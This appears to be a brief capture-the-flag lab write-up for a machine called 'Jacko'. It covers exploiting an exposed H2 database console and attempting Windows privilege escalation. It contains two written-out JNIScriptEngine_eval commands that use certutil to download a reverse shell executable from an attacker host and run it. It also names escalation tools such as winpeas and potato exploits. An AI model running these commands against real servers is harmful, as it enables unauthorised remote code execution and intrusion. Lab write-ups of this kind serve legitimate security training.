Jacko 🔸

Enumeration

Web server is an H2 java database welcome page

At 8082 we have the console

Initial Access

We can access clicking on connect.

Then we can execute arbitrary commands as seen in https://www.exploit-db.com/exploits/49384

Once all commands are executed, we can upload a reverse shell and execute it.

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.220/reverse.exe C:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');

We have a restricted user so reconstruct the path.

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0\;

Get the flag

Privilege Escalation

Transfer winpeas

We find a Paperstream ip program that seems out of the ordinary.

Searching for exploit

Generate the reverse shell dll and transfer them to the host

Bug

It doesn't work with PaperStream method or abusing seimpersonateprivilege method (juicypotato, godpotato, printspoofer...)